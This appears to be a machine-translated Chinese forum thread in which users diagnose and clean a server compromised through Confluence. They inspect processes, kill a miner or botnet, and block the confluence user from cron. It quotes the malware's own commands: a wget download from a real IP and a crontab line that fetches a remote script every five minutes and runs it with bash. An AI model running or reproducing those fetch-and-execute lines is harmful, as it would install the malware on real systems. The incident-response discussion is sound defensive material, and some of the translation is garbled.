你的服务器看起来像黑客。请仔细查看流程列表。例如运行ps auxc并查看进程二进制源。

您可以使用像rkhunter这样的工具来扫描您的服务器，但一般情况下，您应该在开始时杀死所有已经作为汇合用户进行搜索的内容，扫描您的服务器/帐户，升级您的汇合（在大多数情况下是用户确定的攻击源），并查看在你的汇合中为其他帐户等

您是否希望了解该过程中的内容，请查看/ proc，例如在ls -la /proc/996。你也会看到源二进制文件。您也可以在strace -ff -p 996吃午餐以查看正在进行的过程或cat /proc/996/exe | strings以查看二进制文件的字符串。这可能是某种僵尸网络部分，矿工等。

我有同样的问题，它被黑了，病毒脚本在/ tmp，从命令“top”找到脚本名称（无意义的字母，名称“fcbk6hj”是我的。）并杀死进程（可能是3个进程）

根3158 1 0 15:18？ 00:00:01 ./fcbk6hj ./jd8CKgl root 3159 1 0 15:18？ 00:00:01 ./fcbk6hj ./5CDocHl root 3160 1 0 15:18？ 00:00:11 ./fcbk6hj ./prot

杀死所有这些并删除/ tmp / prot，并杀死/ boot / vmlinuz，CPU的进程。

我发现病毒已经自动将脚本下载到/ tmp，我的方法是mv wgetak到其他名称。

病毒行为：wgetak -q http://51.38.133.232:80/86su.jpg -O ./KC5GkAo

发现以下任务是用crontab编写的，只需删除它：* / 5 * * * * / usr / bin / wgetak -q -O / tmp / seasame http://51.38.133.232:80 && bash / tmp / seasame

从系统和crontab中删除它后，也许是好主意（至少现在）将汇合用户添加到/etc/cron.deny。

之后：

$ crontab -e
You (confluence) are not allowed to use this program (crontab)
See crontab(1) for more information

我也同时遇到了同样的问题，也许这是一个汇合错误。我只是杀了汇合过程，它没事。